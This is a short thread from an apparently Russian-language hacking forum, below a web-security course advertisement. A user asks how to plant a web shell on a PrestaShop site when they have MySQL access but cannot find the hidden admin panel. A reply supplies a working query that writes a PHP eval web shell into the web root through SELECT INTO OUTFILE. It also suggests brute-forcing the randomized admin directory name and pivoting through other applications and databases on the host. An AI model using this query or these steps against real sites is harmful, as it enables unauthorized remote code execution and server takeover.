• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

PrestaShop шелл

r0t0r

New member
21.11.2019
1
0
Господа, кто-нибудь знает или умеет лить шелл на PrestaShop без доступа к админке, но с доступом к бд мускула?
Поковырял CMS-ку - разрабы знатно заморочились с тем чтоб припрятать админку. При установке генерится рандомный набор символов, который добавляется к названию директории с админкой, в итоге получается что-то типа admin7381k7ayeu. Этот набор символов ни в каком месте больше не светится, ни в бд ни в файлах.
 
1) При условии что есть file_priv=y у пользователя базы и ты знаешь полный путь куда лить будешь файл + там есть права на запись и mysql стоит на том же сервере. Запросом вроде

Код:
SELECT "<?php eval($_GET['code']); ?>" into outfile "/var/www/codeby/yatvoyshell.php"

2) Посмотри алг как генерируется в движке имя этой папки, попробуй пробрутить.
3) Другие приложения на хосте? Доступ к другим базам?
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab